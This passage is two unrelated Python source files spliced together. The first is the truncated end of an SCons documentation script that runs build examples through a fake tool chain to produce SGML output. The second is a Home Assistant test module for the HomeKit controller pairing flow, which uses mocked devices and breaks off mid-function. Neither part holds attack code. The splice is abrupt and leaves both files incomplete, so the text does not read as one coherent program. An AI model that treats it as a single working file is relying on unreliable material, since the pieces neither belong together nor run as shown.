('javac', 'JAVACCOM', JavaCCom, []),
('javah', 'JAVAHCOM', JavaHCom, []),
('jar', 'JARCOM', JarCom, []),
('rmic', 'RMICCOM', Cat, []),
],
'win32' : [('msvc', ['CCCOM', 'SHCCCOM', 'RCCOM'], CCCom, ['CCFLAGS', 'CPPDEFINES', 'COLOR', 'COLORS', 'PACKAGE']),
('mslink', ['LINKCOM', 'SHLINKCOM'], Cat, []),
('mslib', 'ARCOM', Cat, []),
('tar', 'TARCOM', Null, []),
('zip', 'ZIPCOM', Null, []),
('BitKeeper', 'BITKEEPERCOM', Cat, []),
('CVS', 'CVSCOM', Cat, []),
('RCS', 'RCS_COCOM', Cat, []),
('SCCS', 'SCCSCOM', Cat, []),
('javac', 'JAVACCOM', JavaCCom, []),
('javah', 'JAVAHCOM', JavaHCom, []),
('jar', 'JARCOM', JarCom, []),
('rmic', 'RMICCOM', Cat, []),
],
}
toollist = ToolList[platform]
filter_tools = '%(tools)s'.split()
if filter_tools:
toollist = [x for x in toollist if x[0] in filter_tools]
toollist = [ToolSurrogate(*t) for t in toollist]
toollist.append('install')
def surrogate_spawn(sh, escape, cmd, args, env):
pass
def surrogate_pspawn(sh, escape, cmd, args, env, stdout, stderr):
pass
SCons.Defaults.ConstructionEnvironment.update({
'PLATFORM' : platform,
'TOOLS' : toollist,
'SPAWN' : surrogate_spawn,
'PSPAWN' : surrogate_pspawn,
})
SConscript('SConstruct')
"""
# "Commands" that we will execute in our examples.
def command_scons(args, c, test, dict):
save_vals = {}
delete_keys = []
try:
ce = c.environment
except AttributeError:
pass
else:
for arg in c.environment.split():
key, val = arg.split('=')
try:
save_vals[key] = os.environ[key]
except KeyError:
delete_keys.append(key)
os.environ[key] = val
test.run(interpreter = sys.executable,
program = scons_py,
# We use ToolSurrogates to capture win32 output by "building"
# examples using a fake win32 tool chain. Suppress the
# warnings that come from the new revamped VS support so
# we can build doc on (Linux) systems that don't have
# Visual C installed.
arguments = '--warn=no-visual-c-missing -f - ' + ' '.join(args),
chdir = test.workpath('WORK'),
stdin = Stdin % dict)
os.environ.update(save_vals)
for key in delete_keys:
del(os.environ[key])
out = test.stdout()
out = out.replace(test.workpath('ROOT'), '')
out = out.replace(test.workpath('WORK/SConstruct'),
'/home/my/project/SConstruct')
lines = out.split('\n')
if lines:
while lines[-1] == '':
lines = lines[:-1]
#err = test.stderr()
#if err:
# sys.stderr.write(err)
return lines
def command_touch(args, c, test, dict):
if args[0] == '-t':
t = int(time.mktime(time.strptime(args[1], '%Y%m%d%H%M')))
times = (t, t)
args = args[2:]
else:
time.sleep(1)
times = None
for file in args:
if not os.path.isabs(file):
file = os.path.join(test.workpath('WORK'), file)
if not os.path.exists(file):
open(file, 'wb')
os.utime(file, times)
return []
def command_edit(args, c, test, dict):
try:
add_string = c.edit[:]
except AttributeError:
add_string = 'void edit(void) { ; }\n'
if add_string[-1] != '\n':
add_string = add_string + '\n'
for file in args:
if not os.path.isabs(file):
file = os.path.join(test.workpath('WORK'), file)
contents = open(file, 'rb').read()
open(file, 'wb').write(contents + add_string)
return []
def command_ls(args, c, test, dict):
def ls(a):
return [' '.join(sorted([x for x in os.listdir(a) if x[0] != '.']))]
if args:
l = []
for a in args:
l.extend(ls(test.workpath('WORK', a)))
return l
else:
return ls(test.workpath('WORK'))
def command_sleep(args, c, test, dict):
time.sleep(int(args[0]))
CommandDict = {
'scons' : command_scons,
'touch' : command_touch,
'edit' : command_edit,
'ls' : command_ls,
'sleep' : command_sleep,
}
def ExecuteCommand(args, c, t, dict):
try:
func = CommandDict[args[0]]
except KeyError:
func = lambda args, c, t, dict: []
return func(args[1:], c, t, dict)
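# Dispatch example (illustrative): ExecuteCommand(['scons', '-Q'], c, t, d)
# calls command_scons(['-Q'], c, t, d), while an unrecognized command name
# falls back to the no-op lambda and produces no output lines.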
class MySGML(sgmllib.SGMLParser):
"""A subclass of the standard Python sgmllib SGML parser.
This extends the standard sgmllib parser to recognize, and do cool
stuff with, the added tags that describe our SCons examples,
commands, and other stuff.
"""
def __init__(self, outfp):
sgmllib.SGMLParser.__init__(self)
self.examples = {}
self.afunclist = []
self.outfp = outfp
# The first set of methods here essentially implement pass-through
# handling of most of the stuff in an SGML file. We're really
# only concerned with the tags specific to SCons example processing,
# the methods for which get defined below.
def handle_data(self, data):
try:
f = self.afunclist[-1]
except IndexError:
self.outfp.write(data)
else:
f(data)
def handle_comment(self, data):
self.outfp.write('<!--' + data + '-->')
def handle_decl(self, data):
self.outfp.write('<!' + data + '>')
def unknown_starttag(self, tag, attrs):
try:
f = self.example.afunc
except AttributeError:
f = self.outfp.write
if not attrs:
f('<' + tag + '>')
else:
f('<' + tag)
for name, value in attrs:
f(' ' + name + '=' + '"' + value + '"')
f('>')
def unknown_endtag(self, tag):
self.outfp.write('</' + tag + '>')
def unknown_entityref(self, ref):
self.outfp.write('&' + ref + ';')
def unknown_charref(self, ref):
self.outfp.write('&#' + ref + ';')
# Here is where the heavy lifting begins. The following methods
# handle the begin-end tags of our SCons examples.
def for_display(self, contents):
contents = contents.replace('__ROOT__', '')
contents = contents.replace('<', '<')
contents = contents.replace('>', '>')
return contents
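# Illustrative: for_display('cc -o __ROOT__/usr/bin/foo foo.c < input')
# drops the __ROOT__ marker and escapes '<' and '>' so the text can be
# embedded directly in the generated SGML output.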
def start_scons_example(self, attrs):
t = [t for t in attrs if t[0] == 'name']
if t:
name = t[0][1]
try:
e = self.examples[name]
except KeyError:
e = self.examples[name] = Example()
else:
e = Example()
for name, value in attrs:
setattr(e, name, value)
self.e = e
self.afunclist.append(e.afunc)
def end_scons_example(self):
e = self.e
files = [f for f in e.files if f.printme]
if files:
self.outfp.write('<programlisting>')
for f in files:
if f.printme:
i = len(f.data) - 1
while f.data[i] == ' ':
i = i - 1
output = self.for_display(f.data[:i+1])
self.outfp.write(output)
if e.data and e.data[0] == '\n':
e.data = e.data[1:]
self.outfp.write(e.data + '</programlisting>')
delattr(self, 'e')
self.afunclist = self.afunclist[:-1]
def start_file(self, attrs):
try:
e = self.e
except AttributeError:
self.error("<file> tag outside of <scons_example>")
t = [t for t in attrs if t[0] == 'name']
if not t:
self.error("no <file> name attribute found")
try:
e.prefix
except AttributeError:
e.prefix = e.data
e.data = ""
f = File(t[0][1])
f.printme = None
for name, value in attrs:
setattr(f, name, value)
e.files.append(f)
self.afunclist.append(f.afunc)
def end_file(self):
self.e.data = ""
self.afunclist = self.afunclist[:-1]
def start_directory(self, attrs):
try:
e = self.e
except AttributeError:
self.error("<directory> tag outside of <scons_example>")
t = [t for t in attrs if t[0] == 'name']
if not t:
self.error("no <directory> name attribute found")
try:
e.prefix
except AttributeError:
e.prefix = e.data
e.data = ""
d = Directory(t[0][1])
for name, value in attrs:
setattr(d, name, value)
e.dirs.append(d)
self.afunclist.append(d.afunc)
def end_directory(self):
self.e.data = ""
self.afunclist = self.afunclist[:-1]
def start_scons_example_file(self, attrs):
t = [t for t in attrs if t[0] == 'example']
if not t:
self.error("no <scons_example_file> example attribute found")
exname = t[0][1]
try:
e = self.examples[exname]
except KeyError:
self.error("unknown example name '%s'" % exname)
fattrs = [t for t in attrs if t[0] == 'name']
if not fattrs:
self.error("no <scons_example_file> name attribute found")
fname = fattrs[0][1]
f = [f for f in e.files if f.name == fname]
if not f:
self.error("example '%s' does not have a file named '%s'" % (exname, fname))
self.f = f[0]
def end_scons_example_file(self):
f = self.f
self.outfp.write('<programlisting>')
self.outfp.write(f.data + '</programlisting>')
delattr(self, 'f')
def start_scons_output(self, attrs):
t = [t for t in attrs if t[0] == 'example']
if not t:
self.error("no <scons_output> example attribute found")
exname = t[0][1]
try:
e = self.examples[exname]
except KeyError:
self.error("unknown example name '%s'" % exname)
# Default values for an example.
o = Output()
o.preserve = None
o.os = 'posix'
o.tools = ''
o.e = e
# Locally-set.
for name, value in attrs:
setattr(o, name, value)
self.o = o
self.afunclist.append(o.afunc)
def end_scons_output(self):
# The real raison d'etre for this script: this is where we
# actually execute SCons to fetch the output.
o = self.o
e = o.e
t = TestCmd.TestCmd(workdir='', combine=1)
if o.preserve:
t.preserve()
t.subdir('ROOT', 'WORK')
t.rootpath = t.workpath('ROOT').replace('\\', '\\\\')
for d in e.dirs:
dir = t.workpath('WORK', d.name)
if not os.path.exists(dir):
os.makedirs(dir)
for f in e.files:
i = 0
while f.data[i] == '\n':
i = i + 1
lines = f.data[i:].split('\n')
i = 0
while lines[0][i] == ' ':
i = i + 1
lines = [l[i:] for l in lines]
path = f.name.replace('__ROOT__', t.rootpath)
if not os.path.isabs(path):
path = t.workpath('WORK', path)
dir, name = os.path.split(path)
if dir and not os.path.exists(dir):
os.makedirs(dir)
content = '\n'.join(lines)
content = content.replace('__ROOT__', t.rootpath)
path = t.workpath('WORK', path)
t.write(path, content)
if hasattr(f, 'chmod'):
os.chmod(path, int(f.chmod, 0))
i = len(o.prefix)
while o.prefix[i-1] != '\n':
i = i - 1
self.outfp.write('<screen>' + o.prefix[:i])
p = o.prefix[i:]
# Regular expressions for making the doc output consistent,
# regardless of reported addresses or Python version.
# Massage addresses in object repr strings to a constant.
address_re = re.compile(r' at 0x[0-9a-fA-F]*\>')
# Massage file names in stack traces (sometimes reported as absolute
# paths) to a consistent relative path.
engine_re = re.compile(r' File ".*/src/engine/SCons/')
# Python 2.5 changed the stack trace when the module is read
# from standard input from "... line 7, in ?" to
# "... line 7, in <module>".
file_re = re.compile(r'^( *File ".*", line \d+, in) \?$', re.M)
# Python 2.6 made UserList a new-style class, which changes the
# AttributeError message generated by our NodeList subclass.
nodelist_re = re.compile(r'(AttributeError:) NodeList instance (has no attribute \S+)')
for c in o.commandlist:
self.outfp.write(p + Prompt[o.os])
d = c.data.replace('__ROOT__', '')
self.outfp.write('<userinput>' + d + '</userinput>\n')
e = c.data.replace('__ROOT__', t.workpath('ROOT'))
args = e.split()
lines = ExecuteCommand(args, c, t, {'osname':o.os, 'tools':o.tools})
content = None
if c.output:
content = c.output
elif lines:
content = ( '\n' + p).join(lines)
if content:
content = address_re.sub(r' at 0x700000>', content)
content = engine_re.sub(r' File "bootstrap/src/engine/SCons/', content)
content = file_re.sub(r'\1 <module>', content)
content = nodelist_re.sub(r"\1 'NodeList' object \2", content)
content = self.for_display(content)
self.outfp.write(p + content + '\n')
if o.data[0] == '\n':
o.data = o.data[1:]
self.outfp.write(o.data + '</screen>')
delattr(self, 'o')
self.afunclist = self.afunclist[:-1]
def start_scons_output_command(self, attrs):
try:
o = self.o
except AttributeError:
self.error("<scons_output_command> tag outside of <scons_output>")
try:
o.prefix
except AttributeError:
o.prefix = o.data
o.data = ""
c = Command()
for name, value in attrs:
setattr(c, name, value)
o.commandlist.append(c)
self.afunclist.append(c.afunc)
def end_scons_output_command(self):
self.o.data = ""
self.afunclist = self.afunclist[:-1]
def start_sconstruct(self, attrs):
f = File('')
self.f = f
self.afunclist.append(f.afunc)
def end_sconstruct(self):
f = self.f
self.outfp.write('<programlisting>')
output = self.for_display(f.data)
self.outfp.write(output + '</programlisting>')
delattr(self, 'f')
self.afunclist = self.afunclist[:-1]
def process(filename, fout=sys.stdout):
if filename == '-':
f = sys.stdin
else:
try:
f = open(filename, 'r')
except EnvironmentError, e:
sys.stderr.write('%s: %s\n' % (filename, e))
return 1
data = f.read()
if f is not sys.stdin:
f.close()
if data.startswith('<?xml '):
first_line, data = data.split('\n', 1)
fout.write(first_line + '\n')
x = MySGML(fout)
for c in data:
x.feed(c)
x.close()
return 0
def main(argv=None):
if argv is None:
argv = sys.argv
parser = optparse.OptionParser()
parser.add_option('-d', '--diff',
action='store_true', dest='diff', default=False,
help='create examples for the .in file and output a unified diff against the related .xml file')
parser.add_option('-r', '--run',
action='store_true', dest='run', default=False,
help='create examples for the .in file, but do not change any files')
parser.add_option('-s', '--simple_diff',
action='store_true', dest='simple', default=False,
help='use a simpler output for the diff mode (no unified diff!)')
parser.add_option('-u', '--update',
action='store_true', dest='update', default=False,
help='create examples for the .in file and update the related .xml file')
opts, args = parser.parse_args(argv[1:])
if opts.diff:
import StringIO
import difflib
if not args:
args = glob.glob('doc/user/*.in')
for arg in sorted(args):
diff = None
s = StringIO.StringIO()
process(arg,s)
filename = arg[:-2]+'xml'
try:
fxml = open(filename, 'r')
xmlcontent = fxml.read()
fxml.close()
if opts.simple:
diff = list(difflib.context_diff(xmlcontent.splitlines(),
s.getvalue().splitlines(),
fromfile=arg, tofile=filename))
else:
diff = list(difflib.unified_diff(xmlcontent.splitlines(),
s.getvalue().splitlines(),
fromfile=arg, tofile=filename,
lineterm=''))
except EnvironmentError, e:
sys.stderr.write('%s: %s\n' % (filename, e))
s.close()
if diff:
print "%s:" % arg
print '\n'.join(diff)
elif opts.run:
if not args:
args = glob.glob('doc/user/*.in')
for arg in sorted(args):
print "%s:" % arg
process(arg)
elif opts.update:
if not args:
args = glob.glob('doc/user/*.in')
for arg in sorted(args):
print "%s:" % arg
filename = arg[:-2]+'xml'
try:
fxml = open(filename, 'w')
process(arg, fxml)
fxml.close()
except EnvironmentError, e:
sys.stderr.write('%s: %s\n' % (filename, e))
else:
if not args:
args = ['-']
for arg in args:
process(arg)
if __name__ == "__main__":
sys.exit(main())
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
|
"""Tests for homekit_controller config flow."""
import json
from unittest import mock
import homekit
import pytest
from homeassistant.components.homekit_controller import config_flow
from homeassistant.components.homekit_controller.const import KNOWN_DEVICES
from tests.common import MockConfigEntry
from tests.components.homekit_controller.common import (
Accessory,
FakeService,
setup_platform,
)
PAIRING_START_FORM_ERRORS = [
(homekit.BusyError, "busy_error"),
(homekit.MaxTriesError, "max_tries_error"),
(KeyError, "pairing_failed"),
]
PAIRING_START_ABORT_ERRORS = [
(homekit.AccessoryNotFoundError, "accessory_not_found_error"),
(homekit.UnavailableError, "already_paired"),
]
PAIRING_FINISH_FORM_ERRORS = [
(homekit.MaxPeersError, "max_peers_error"),
(homekit.AuthenticationError, "authentication_error"),
(homekit.UnknownError, "unknown_error"),
(KeyError, "pairing_failed"),
]
PAIRING_FINISH_ABORT_ERRORS = [
(homekit.AccessoryNotFoundError, "accessory_not_found_error")
]
def _setup_flow_handler(hass):
flow = config_flow.HomekitControllerFlowHandler()
flow.hass = hass
flow.context = {}
flow.controller = mock.Mock()
flow.controller.pairings = {}
return flow
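# Note on the helper above: flow.controller is a plain Mock, so individual
# tests can preload flow.controller.pairings, stub
# flow.controller.discover.return_value, and assert on
# flow.controller.start_pairing.call_count without a real HomeKit
# controller being available.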
async def _setup_flow_zeroconf(hass, discovery_info):
result = await hass.config_entries.flow.async_init(
"homekit_controller", context={"source": "zeroconf"}, data=discovery_info
)
return result
async def test_discovery_works(hass):
"""Test a device being discovered."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
# Pairing doesn't error and the resulting pairing is available
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_discovery_works_upper_case(hass):
"""Test a device being discovered."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"MD": "TestDevice", "ID": "00:00:00:00:00:00", "C#": 1, "SF": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_discovery_works_missing_csharp(hass):
"""Test a device being discovered that has missing mdns attrs."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_abort_duplicate_flow(hass):
"""Already paired."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
result = await _setup_flow_zeroconf(hass, discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
result = await _setup_flow_zeroconf(hass, discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_in_progress"
async def test_pair_already_paired_1(hass):
"""Already paired."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_paired"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_discovery_ignored_model(hass):
"""Already paired."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {
"md": config_flow.HOMEKIT_IGNORE[0],
"id": "00:00:00:00:00:00",
"c#": 1,
"sf": 1,
},
}
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "ignored_model"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_discovery_invalid_config_entry(hass):
"""There is already a config entry for the pairing id but its invalid."""
MockConfigEntry(
domain="homekit_controller", data={"AccessoryPairingID": "00:00:00:00:00:00"}
).add_to_hass(hass)
# We just added a mock config entry so it must be visible in hass
assert len(hass.config_entries.async_entries()) == 1
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# Discovery of a HKID that is in a pairable state but for which there is
# already a config entry - in that case the stale config entry is
# automatically removed.
config_entry_count = len(hass.config_entries.async_entries())
assert config_entry_count == 0
async def test_discovery_already_configured(hass):
"""Already configured."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
await setup_platform(hass)
conn = mock.Mock()
conn.config_num = 1
hass.data[KNOWN_DEVICES]["00:00:00:00:00:00"] = conn
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert flow.context == {}
assert conn.async_config_num_changed.call_count == 0
async def test_discovery_already_configured_config_change(hass):
"""Already configured."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 2, "sf": 0},
}
await setup_platform(hass)
conn = mock.Mock()
conn.config_num = 1
hass.data[KNOWN_DEVICES]["00:00:00:00:00:00"] = conn
flow = _setup_flow_handler(hass)
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert flow.context == {}
assert conn.async_refresh_entity_map.call_args == mock.call(2)
async def test_pair_unable_to_pair(hass):
"""Pairing completed without exception, but didn't create a pairing."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
# Pairing doesn't error but no pairing object is generated
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "form"
assert result["errors"]["pairing_code"] == "unable_to_pair"
@pytest.mark.parametrize("exception,expected", PAIRING_START_ABORT_ERRORS)
async def test_pair_abort_errors_on_start(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device refuses to enter pairing mode
with mock.patch.object(flow.controller, "start_pairing") as start_pairing:
start_pairing.side_effect = exception("error")
result = await flow.async_step_pair({})
assert result["type"] == "abort"
assert result["reason"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
@pytest.mark.parametrize("exception,expected", PAIRING_START_FORM_ERRORS)
async def test_pair_form_errors_on_start(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device refuses to enter pairing mode
with mock.patch.object(flow.controller, "start_pairing") as start_pairing:
start_pairing.side_effect = exception("error")
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["errors"]["pairing_code"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
@pytest.mark.parametrize("exception,expected", PAIRING_FINISH_ABORT_ERRORS)
async def test_pair_abort_errors_on_finish(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
# User submits code - pairing fails and the flow aborts
flow.finish_pairing.side_effect = exception("error")
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "abort"
assert result["reason"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
@pytest.mark.parametrize("exception,expected", PAIRING_FINISH_FORM_ERRORS)
async def test_pair_form_errors_on_finish(hass, exception, expected):
"""Test various pairing errors."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
flow = _setup_flow_handler(hass)
# Device is discovered
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
# User initiates pairing - device enters pairing mode and displays code
result = await flow.async_step_pair({})
assert result["type"] == "form"
assert result["step_id"] == "pair"
assert flow.controller.start_pairing.call_count == 1
# User submits code - pairing fails but can be retried
flow.finish_pairing.side_effect = exception("error")
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "form"
assert result["errors"]["pairing_code"] == expected
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_import_works(hass):
"""Test a device being discovered."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
import_info = {"AccessoryPairingID": "00:00:00:00:00:00"}
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
result = await flow.async_import_legacy_pairing(
discovery_info["properties"], import_info
)
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_import_already_configured(hass):
"""Test importing a device from .homekit that is already a ConfigEntry."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 1},
}
import_info = {"AccessoryPairingID": "00:00:00:00:00:00"}
config_entry = MockConfigEntry(domain="homekit_controller", data=import_info)
config_entry.add_to_hass(hass)
flow = _setup_flow_handler(hass)
result = await flow.async_import_legacy_pairing(
discovery_info["properties"], import_info
)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_user_works(hass):
"""Test user initiated disovers devices."""
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"md": "TestDevice",
"id": "00:00:00:00:00:00",
"c#": 1,
"sf": 1,
}
pairing = mock.Mock(pairing_data={"AccessoryPairingID": "00:00:00:00:00:00"})
pairing.list_accessories_and_characteristics.return_value = [
{
"aid": 1,
"services": [
{
"characteristics": [{"type": "23", "value": "Koogeek-LS1-20833F"}],
"type": "3e",
}
],
}
]
flow = _setup_flow_handler(hass)
flow.controller.pairings = {"00:00:00:00:00:00": pairing}
flow.controller.discover.return_value = [discovery_info]
result = await flow.async_step_user()
assert result["type"] == "form"
assert result["step_id"] == "user"
result = await flow.async_step_user({"device": "TestDevice"})
assert result["type"] == "form"
assert result["step_id"] == "pair"
result = await flow.async_step_pair({"pairing_code": "111-22-33"})
assert result["type"] == "create_entry"
assert result["title"] == "Koogeek-LS1-20833F"
assert result["data"] == pairing.pairing_data
async def test_user_no_devices(hass):
"""Test user initiated pairing where no devices discovered."""
flow = _setup_flow_handler(hass)
flow.controller.discover.return_value = []
result = await flow.async_step_user()
assert result["type"] == "abort"
assert result["reason"] == "no_devices"
async def test_user_no_unpaired_devices(hass):
